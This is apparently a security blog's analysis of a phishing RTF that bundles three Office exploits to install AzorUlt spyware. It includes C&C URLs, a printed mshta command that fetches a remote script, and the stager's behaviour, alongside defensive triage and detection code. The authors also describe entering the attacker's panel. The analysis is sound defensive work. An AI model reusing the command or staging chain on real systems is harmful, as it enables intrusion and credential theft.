We have seen plenty of spam mail campaigns carrying RTF documents that exploit infamous vulnerabilities to compromise end-user machines with various malware.
Now let me ask you something...
Were all the systems in your network patched for CVE-2017-11882, CVE-2017-8759 and CVE-2017-0199?
If the answer is NO, you are prone to be compromised by this malicious RTF document!!!
This single RTF document carries 3 infamous exploits, desperately tries to succeed with at least one of them, and then tries to infect the user machine with an atrocious spyware – AzorUlt Version 2.
Let's jump in…
It all started when end users at a Middle East government firm received suspicious mails from an unknown sender.
The mail pretended to come from DHL Express and contained a document file as an attachment, urging the user to open it.
Who doesn’t like parcels 😉
The mail header analysis gives us a hint about an email address (Reply-to) that is likely to be controlled by the offender.
Further analysis revealed that the mail address exists and accepts e-mails. More research on the mail ID revealed that the Gmail account is related to the domain “alkratrad.com” at 184.108.40.206. The domain had some suspicious characteristics, like the creation date (newborn) and fake registration data with mismatches such as state – Duban (Iran), country (Sri Lanka), and address Kempton Park (South Africa).
The document in the attachment was an RTF document, and a closer look shows an executable payload within it:
Did you see the magic numbers “4D 5A” ? There you go.. Scream out… “Portable Executable”!! :p
Do you know who Mark Zbikowski is? Google him … 🙂 That's the story behind the “MZ” string in all Portable Executables.
That said, we can suspect that an executable will be dropped on the fly when this RTF document is opened.
After manual extraction of the executable,
In addition to that, there are three notable OLE objects which were extracted from within the RTF document.
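A static triage pass that looks for what was spotted by hand above (an embedded PE image and the three OLE object types discussed in the rest of this write-up), as an added example that is not part of the original analysis. The `wsdl=` string match and the plain `\objdata` hex decoding are assumptions of this example, and the sample input is constructed:

```python
import re
import struct

# URL Moniker CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} in its stored byte order.
URL_MONIKER_CLSID = bytes.fromhex("E0C9EA79F9BACE118C8200AA004BA90B")
# Assumption of this example: the SOAP moniker's WSDL string is stored as UTF-16LE.
WSDL_UTF16 = "wsdl=".encode("utf-16-le")

def find_pe(data):
    """Offsets where an MZ header's e_lfanew field points at 'PE\\0\\0'."""
    hits = []
    for m in re.finditer(b"MZ", data):
        start = m.start()
        if start + 0x40 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, start + 0x3C)
            if data[start + e_lfanew:start + e_lfanew + 4] == b"PE\x00\x00":
                hits.append(start)
    return hits

def objdata_blobs(rtf):
    """Hex-decode each \\objdata group, skipping whitespace between digits."""
    for m in re.finditer(rb"\\objdata([^{}]*)", rtf):
        digits = re.sub(rb"[^0-9A-Fa-f]", b"", m.group(1))
        yield bytes.fromhex(digits[:len(digits) & ~1].decode("ascii"))

def triage(rtf):
    """Return sorted findings for the raw bytes of one RTF file."""
    found = set()
    if find_pe(rtf):
        found.add("raw PE image in file")
    for blob in objdata_blobs(rtf):
        if URL_MONIKER_CLSID in blob:
            found.add("URL Moniker object")
        if WSDL_UTF16 in blob:
            found.add("SOAP WSDL moniker object")
        if b"equation.3" in blob.lower():
            found.add("Equation Editor object")
    return sorted(found)

def constructed_sample():
    """Constructed test input: three fake OLE blobs plus a stub PE header."""
    blobs = [URL_MONIKER_CLSID + b"\x00" * 4,
             "soap:wsdl=http://example.invalid/x".encode("utf-16-le"),
             b"\x01\x05\x00\x00Equation.3\x00"]
    groups = b"".join(b"{\\object{\\*\\objdata " + b.hex().encode() + b"\n}}"
                      for b in blobs)
    stub_pe = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00"
    return b"{\\rtf1 " + groups + b"}" + stub_pe

if __name__ == "__main__":
    print(triage(constructed_sample()))
```

Real samples often break up the hex with control words and nested groups, so a dedicated parser such as rtfobj from oletools is the better extractor; the checks on the decoded bytes stay the same.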
With this nudge in mind, let's see what happens when the document is opened:
This popup is a reminder that the RTF may contain embedded objects.
While the document was opening, we can see the malicious traffic initiated to a C&C server “alkratrad.com/b/tp.php?thread=0”
This was spot on and clearly relates the email address found in the mail header to the domain.
Let's get into the party…
First : CVE 2017-8759
On checking the stream of the traffic, we can infer that it’s trying to get the WSDL definitions from the target URL destination:
Below is the full WSDL definition retrieved from the server, and it points to the CVE 2017 8759 WSDL Parser Code Injection.
This vulnerability and its details had been explained in the link
With that said, here is the high-level idea in our case:
- On putting one of the OLE objects extracted from the RTF document under the microscope, we can infer that it contains a SOAP moniker, as shown below
- After the moniker is invoked, the WSDL definition is retrieved as mentioned before.
- The WSDL parser parses the content of the definition, generates a “.cs” source file (Logo.cs) and drops it on the end machine.
- csc.exe of the .NET framework compiles Logo.cs and drops “http100alkratrad4com0b0tp4php2thread90.dll”. And yes, of course, a .pdb file is also dropped (“http100alkratrad4com0b0tp4php2thread90.pdb”).
- The http100alkratrad4com0b0tp4php2thread90.dll is loaded and completes the exploitation, which launches “mshta.exe”; this retrieves another VBScript which contains a PowerShell script, and at last the script is executed.
Meanwhile, as we suspected in the beginning, an executable was dropped from the RTF document to C:\Users\<username>\Appdata\Roaming\
The script retrieved from the C&C at http://alkratrad.com/b/t.php?thread=0:
- The script kills any winword.exe processes currently running on the end machine.
- Then it looks up the opened document's file name and path. In this case it is “copy.doc”.
- This copy.doc is copied to the temp folder as “o.tmp”.
- The content from a particular offset is then read from “o.tmp” and written back over the original “copy.doc”, and the newly written “copy.doc” is opened.
- This is the decoy document which will be opened to trick the user.
Somebody forgot to amend the wording? 😉
BTW, it's English and Russian…
- Now the script again retrieves a particular portion of “o.tmp” and writes it as “result.exe” to C:\Users\<username>\Appdata\Roaming\. This executable is then executed, as we already suspected.
- Next, the script tries to communicate with the C&C server at hxxp://alkratrad.com/b/t.php?act=hit
- This looks like a self-submission probe to the C&C server about the successful infection.
- Then the script deletes the files (*.cs, *.dll, *.pdb) that were dropped while exploiting CVE 2017 8759.
- At last, it terminates the PowerShell instance.
Now the baton is with the running result.exe, which was later found to be the Azorult version 2 spyware, which steals credentials, browser, cookies etc.
Now, what if CVE-2017-8759 was patched?
Second : CVE 2017-11882
On analyzing the next OLE object stream retrieved from the RTF document,
At a glimpse, we get clarity on the exploit used:
More details on the vulnerability are explained in the link
High-level brief in our case:
- The malicious RTF document has an embedded OLE Equation object. The Microsoft Equation Editor is the victim here: it has a stack buffer overflow vulnerability that an attacker can exploit to execute arbitrary commands.
- Writing more bytes than expected to the font record of the implementation makes it overflow. This overwrites the return address, and execution flow is then handed to the attacker's address.
- In our case, a successful exploitation of this vulnerability will execute “mshta.exe http://alkratrad.com/b/t.php?thread=0”
- The same VBScript with the PowerShell script will be executed. Then the story continues exactly as explained before. In this way the end machine is infected with the spyware (result.exe).
Again, what if CVE-2017-11882 also didn't work?
Third : CVE 2017-0199
On analyzing the third OLE embedded object within the RTF document, we can see the URL Moniker being used to connect to the remote C&C server. More details regarding the vulnerability in the link
This URL Moniker is used to communicate with the C&C server, which hosts the VBScript. The moniker recognizes the content type of the remote file and makes Microsoft's HTA engine execute the script.
So, due to the vulnerability, mshta.exe is called by Word and executes the script at :
Now we know what will happen from the previous two scenarios explained above. On successful exploitation, the end machine will be infected with the spyware (result.exe).
We can see below WINWORD.EXE launching mshta.exe to communicate with the C&C server and execute the script. Each instance corresponds to one of the exploits.
Once the script starts running, the parent Winword.exe is killed by taskkill.exe, issued by PowerShell.
Then the new decoy Word document is opened by PowerShell. At last, the malware executable (“result.exe”) gets executed.
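The process chain described above can be hunted for in process-creation telemetry. The following is an added example, not part of the original analysis: it correlates the three stages per host, in order, over constructed events. The event field names and file paths are assumptions, not a specific EDR schema:

```python
import re

def base(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

ROAMING_EXE = re.compile(r"\\appdata\\roaming\\[^\\]+\.exe$", re.I)

# Stages in the order the write-up reports them. Each predicate sees one
# process-creation event; the field names are assumptions of this example.
STAGES = [
    ("word_spawns_mshta", lambda e: base(e["parent"]) == "winword.exe"
        and base(e["image"]) == "mshta.exe"),
    ("powershell_kills_word", lambda e: base(e["parent"]) == "powershell.exe"
        and base(e["image"]) == "taskkill.exe" and "winword" in e["cmd"].lower()),
    ("powershell_runs_roaming_exe", lambda e: base(e["parent"]) == "powershell.exe"
        and ROAMING_EXE.search(e["image"]) is not None),
]

def detect(events):
    """Map host -> stages matched in order; events must be time-ordered."""
    progress = {}
    for e in events:
        done = progress.get(e["host"], [])
        if len(done) < len(STAGES):
            name, matches = STAGES[len(done)]
            if matches(e):
                progress[e["host"]] = done + [name]
    return progress

def full_chain_hosts(events):
    """Hosts on which every stage was seen, i.e. the payload was launched."""
    return sorted(h for h, s in detect(events).items() if len(s) == len(STAGES))

def ev(host, parent, image, cmd=""):
    return {"host": host, "parent": parent, "image": image, "cmd": cmd}

W = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events: PC-01 runs the whole chain, PC-02 stops after mshta,
# PC-03 shows unrelated activity that must not match.
CONSTRUCTED_EVENTS = [
    ev("PC-03", r"C:\Windows\explorer.exe", W),
    ev("PC-01", W, r"C:\Windows\System32\mshta.exe", "mshta.exe http://c2.example.invalid/"),
    ev("PC-02", W, r"C:\Windows\System32\mshta.exe", "mshta.exe http://c2.example.invalid/"),
    ev("PC-03", PS, r"C:\Windows\System32\taskkill.exe", "taskkill /f /im notepad.exe"),
    ev("PC-01", PS, r"C:\Windows\System32\taskkill.exe", "taskkill /f /im winword.exe"),
    ev("PC-01", PS, r"C:\Users\user1\AppData\Roaming\result.exe"),
]
```

A host that only reaches the first stage (PC-02 here) still deserves a look, since Word launching mshta.exe means one of the three exploits fired even if the payload never ran.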
Once the machine is infected, we will see the post compromise traffic to the same C&C server:
The malware exfiltrates the sensitive details from the victim machine to the C&C at
This gives a hint that after this checkpoint, we will be at the web interface of the offender, where he will be getting all the leaked victim info.
Curiosity is human’s basic nature ;p
After a successful jump over this checkpoint, we could confirm that the spyware in our scenario was the infamous “AzorUlt 2 Spyware”. The web interface contained all the details of the victims, including credentials, browser history, cookies, system info, running processes, IP addresses, hostnames, etc.
The spyware interface even had a very informative dashboard for the offender, which gives an idea about the victims based on the country and other details.
The victim list can be viewed further, and the information of each victim can be downloaded in .zip format, which contains credentials, browser history, cookies, system info, running processes, IP addresses, hostnames, etc.
There is a config area within the interface, which gives the offender control as a whole, even if he wants to execute another executable.
Let me reiterate, Curiosity is Human’s Basic Nature 😉
After a few days we could identify that the offender was using a compromised website (with a malicious exe hosted).
On further research, we found that the exe is related to the infamous Citadel malware, which tries to communicate with
So the offender behind the spyware AzorUltV2 is involved in the Citadel campaign as well.
Let me tell you a short story which I read somewhere …
“When the last man on the earth was in his room, THE DOOR WAS KNOCKED !!”
End of story …
You will be in the same scary situation if you keep your systems unpatched. The exploits will come and easily knock you down. Spend some time to have a proper Vulnerability Management process for your firm. Let me repeat: spend some time to have a PROPER Vulnerability Management process for your firm.
With the above writeup, we understood that any number of exploits can be packed into a single RTF file. We cannot imagine the latest techniques and tactics the offenders use to sneak through our networks and systems, which we claim to be airtight. So….
Precaution is always better than Cure.
URL and IP address
220.127.116.11 – cita.exe
hxxp://18.104.22.168/albi/file.php – cita.exe